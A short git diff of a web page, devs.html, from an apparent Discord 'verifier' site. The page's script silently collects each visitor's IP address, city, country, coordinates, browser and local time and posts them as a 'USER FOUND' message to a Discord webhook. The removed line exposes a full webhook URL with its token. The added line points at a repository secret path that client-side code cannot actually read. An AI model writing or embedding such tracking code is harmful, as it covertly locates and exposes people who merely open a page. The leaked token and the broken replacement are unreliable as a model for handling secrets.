--- a/devs.html
+++ b/devs.html
@@ -305,7 +305,7 @@
                     var longitude = data.loc.split(',')[1];
                     var browser = navigator.userAgent;
                     var currentTime = new Date().toLocaleString();
-                    var webhookUrl = "https://discord.com/api/webhooks/1236725710408646666/QXC9cW4S-Eeh7tmxZ18sZxp9ZZgFe4JqkMhkiDVtIxTIRKdfu377pvSP1j5MN4e3qcv9";
+                    var webhookUrl = "/repos/verifier-discord/verifier-discord.github.io/actions/secrets/visitor_webhook";
                     var message = "USER FOUND:\nIP address is: " + ipAddress + "\nlocated in: " + city + ", " + country + "\nlatitude is: " + latitude + "\nlongitude is: " + longitude + "\nbrowser was opened at: " + currentTime;
 
                     var xhr = new XMLHttpRequest();
